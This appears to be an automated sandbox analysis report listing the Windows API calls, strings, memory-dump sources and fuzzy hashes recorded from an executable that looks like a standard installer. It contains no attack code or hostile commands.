                                                                                    • EnterCriticalSection.KERNEL32(006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                                                    • LeaveCriticalSection.KERNEL32(006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                                                    • LeaveCriticalSection.KERNEL32(006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                                                    • IsValidLocale.KERNEL32(00000000,00000002,006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                                                    • EnterCriticalSection.KERNEL32(006D0C14,00000000,00000002,006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                                                    • LeaveCriticalSection.KERNEL32(006D0C14,006D0C14,00000000,00000002,006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                    • String ID: en-US,en,
                                                                                    • API String ID: 975949045-3579323720
                                                                                    • Opcode ID: 132b5c44b66357a61607cea8e570c4f98048163ec2b2b075c620ee471578f9dc
                                                                                    • Instruction ID: 4182a3ca1ca8de6b44c3d638db47ef535eef3e1020ae15a43facf6376d410dc7
                                                                                    • Instruction Fuzzy Hash: B221C360B506149AEB20B7B78C42B1E3286DB45708F50497FB440BF3C6CAFC8C458AAF
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0062464A,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00629FF1,00000000,0062A005), ref: 00624556
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062459A
                                                                                      • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                    • API String ID: 1914119943-2711329623
                                                                                    • Opcode ID: 3799fd6d903a69a31f79a75ffe0ed153fdae39087b1b7be4b8271f0e1526af79
                                                                                    • Instruction ID: 6e8e0d31e8c3c09f4e33b7ba0e6d10679ae3de64b1987244dfe505353b5bcc3b
                                                                                    • Instruction Fuzzy Hash: E9219CB1A40A24AFDB04EBAADC42D6B77EEEF8A7403114469F400E7651EE34EC018F25
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A,?,00000000), ref: 005C6D97
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A,?,00000000), ref: 005C6DEA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    • API String ID: 4190037839-2401316094
                                                                                    • Opcode ID: 6b6c522d3c770edab7bcb67ac98bb70ea1e086da121dbc8d7ea2477832c323e3
                                                                                    • Instruction ID: 99792ba0868377f284877609c025123efe30c02dabd3e6f2c0b5c4ff46beac99
                                                                                    • Instruction Fuzzy Hash: BC212C79A00209AEDB10EAF1D856F9F7BF9FB48704F60486EE500E7281EA74AB408755
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624B84,00000000, /s ",006D479C,regsvr32.exe",?,00624B84), ref: 00624AF2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: 34d3b25b57eaeacb979759aa2842bb8b8fece2e0b53ebe8d3df0fc9dfb4c882e
                                                                                    • Instruction ID: 95f43718ecb6a3265bc8f77fac2cb7b4ee0adae1cc946baa76750ec423c23771
                                                                                    • Instruction Fuzzy Hash: DA413134A40718ABDB10EFE5D892BDDBBBAFF48304F50417EA504A7282DB749A05CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                                                    • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: <T@
                                                                                    • API String ID: 3320372497-2050694182
                                                                                    • Opcode ID: 4b1bca956a6cf0ac3a8163dca5164d8526c5294e1121d059f47b6d96abba5736
                                                                                    • Instruction ID: 33e408ca48ad1dbcb2fa22716985c37038247fab0905643a34c658cb983966db
                                                                                    • Opcode Fuzzy Hash: 4b1bca956a6cf0ac3a8163dca5164d8526c5294e1121d059f47b6d96abba5736
                                                                                    • Instruction Fuzzy Hash: A401A9A16086147DE610F3BA9C8AF6B279CCB0976CF10463BB614F61D2C97C9C548B7E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 8bac78cd018c24294fae1372a9ade90c3476160636c7b0da8341b439c678a567
                                                                                    • Instruction ID: da3bc9e3fd9e780578e72be1a575793d19e87bbd1db11b6bdefce3007bd96747
                                                                                    • Opcode Fuzzy Hash: 8bac78cd018c24294fae1372a9ade90c3476160636c7b0da8341b439c678a567
                                                                                    • Instruction Fuzzy Hash: CA71D131600A408FD715DB29C988B27BBD5EF85314F18C17FE884AB3D2D6B98941CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00628DEE,?,00000000,?), ref: 00628D30
                                                                                      • Part of subcall function 0060D90C: FindClose.KERNEL32(000000FF,0060DA01), ref: 0060D9F0
                                                                                    Strings
                                                                                    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00628DA7
                                                                                    • Failed to strip read-only attribute., xrefs: 00628CFE
                                                                                    • Stripped read-only attribute., xrefs: 00628CF2
                                                                                    • Failed to delete directory (%d)., xrefs: 00628DC8
                                                                                    • Failed to delete directory (%d). Will retry later., xrefs: 00628D49
                                                                                    • Deleting directory: %s, xrefs: 00628CB7
                                                                                    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00628D0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CloseErrorFindLast
                                                                                    • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                    • API String ID: 754982922-1448842058
                                                                                    • Opcode ID: 28624e6f44032b5ba2e5a621e047490d4a34b5c471f31a3dbc582fc3682b03b5
                                                                                    • Instruction ID: 0d7053e611d435c1968383ac90d2efcc691faa7e680c69a06bbf0affe518b4a0
                                                                                    • Opcode Fuzzy Hash: 28624e6f44032b5ba2e5a621e047490d4a34b5c471f31a3dbc582fc3682b03b5
                                                                                    • Instruction Fuzzy Hash: 3041D630A019288EDB04EB68EC452EEB6F7AF94304F55897EA411E73C1CF748D098F66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 005B83B6
                                                                                    • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1994056952-0
                                                                                    • Opcode ID: 222849e93f791e6fe5336b19d95e43f48479be18d58de6e0f9e896b259e8fefc
                                                                                    • Instruction ID: 47a373bf8cf15ed47240c2e20fb0cc0c25a2ef49831a5707915557531a2b0ceb
                                                                                    • Opcode Fuzzy Hash: 222849e93f791e6fe5336b19d95e43f48479be18d58de6e0f9e896b259e8fefc
                                                                                    • Instruction Fuzzy Hash: 0021CEB520460A6FDA60EA99CE80FF777DCFF44748B105829B999C3642EE14FC40C769
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 608735f5bce0e36611a6a74c8b5942bb2db45b7b298456c3db6888c90be37e0c
                                                                                    • Instruction ID: 7dd5b4cb36b4a9a591d6b9d30fe19ff178ae28b977775f2e11cfa4002bd538ad
                                                                                    • Opcode Fuzzy Hash: 608735f5bce0e36611a6a74c8b5942bb2db45b7b298456c3db6888c90be37e0c
                                                                                    • Instruction Fuzzy Hash: 04C123A2710A004BD714AA7D9C8476FB286DBC5324F19823FF645EB3D6DA7CCC558B88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D2F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                    • API String ID: 390214022-3304407042
                                                                                    • Opcode ID: 1357a6a6f4ac0e338640df696ce31ab3616580a8c460ec0e97379f23ea9106e4
                                                                                    • Instruction ID: 7d9515a221cbc80ce02f792d78276580e8b66b65743a39b66aad4c04d9ca5984
                                                                                    • Opcode Fuzzy Hash: 1357a6a6f4ac0e338640df696ce31ab3616580a8c460ec0e97379f23ea9106e4
                                                                                    • Instruction Fuzzy Hash: E7812B70A40209AFDF14EBE4D882BDEBBB6FF84304F504569E800B7291D778AE45CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                                                    • GetTickCount.KERNEL32 ref: 00408E4F
                                                                                    • GetTickCount.KERNEL32 ref: 00408E67
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                                                    • GetTickCount.KERNEL32 ref: 00408EC1
                                                                                    • GetTickCount.KERNEL32 ref: 00408EF8
                                                                                    • GetTickCount.KERNEL32 ref: 00408F22
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CountTick$CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 3968769311-0
                                                                                    • Opcode ID: 6ac2be8b98c6d59f6bfb7c2bc899f414c467b6e539e9ece706351b94971b3cf7
                                                                                    • Instruction ID: 6a262f9eb7bf8d50cb6d4ed5a75cfeecc0694df2e1247547c03083db5600c3d5
                                                                                    • Opcode Fuzzy Hash: 6ac2be8b98c6d59f6bfb7c2bc899f414c467b6e539e9ece706351b94971b3cf7
                                                                                    • Instruction Fuzzy Hash: C74171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4938
• GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4951
• CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A497B
• CloseHandle.KERNEL32(00000000), ref: 006A4999
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: FileHandle$AttributesCloseCreateModule
• String ID: GetFinalPathNameByHandleW$kernel32.dll
• API String ID: 791737717-340263132
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
• GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressErrorHandleLastModuleProc
• String ID: @$GetLogicalProcessorInformation$kernel32.dll
• API String ID: 4275029093-79381301
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 005CD19D
  • Part of subcall function 004EE230: EnterCriticalSection.KERNEL32(?,00000000,004EE49F,?,?), ref: 004EE278
• SelectObject.GDI32(0068C9D4,00000000), ref: 005CD1BF
• GetTextExtentPointW.GDI32(0068C9D4,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CD1D3
• GetTextMetricsW.GDI32(0068C9D4,?,00000000,005CD218,?,00000000,?,?,0068C9D4), ref: 005CD1F5
• ReleaseDC.USER32 ref: 005CD212
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CD1CA
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 1334710084-222967699
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
• GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
• WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileHandleWrite
• String ID: Error$Runtime error at 00000000
• API String ID: 3320372497-2970929446
Uniqueness

Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317C9
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317E5
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0043181E
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0043189B
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318B4
• VariantCopy.OLEAUT32(?,?), ref: 004318EF
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EC), ref: 006AD11C
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B6179,00000000,006B6AB5), ref: 006AD14B
• GetWindowLongW.USER32(?,000000EC), ref: 006AD160
• SetWindowLongW.USER32 ref: 006AD187
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AD1A0
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AD1C1
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
• Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
• Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
• Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
Uniqueness

Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006152A1
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006152C8
                                                                                    • SetForegroundWindow.USER32(?,00000000,006155A0,?,00000000,006155DE), ref: 006152D9
                                                                                    • DefWindowProcW.USER32(00000000,?,?,?,00000000,006155A0,?,00000000,006155DE), ref: 0061558B
                                                                                    Strings
                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00615413
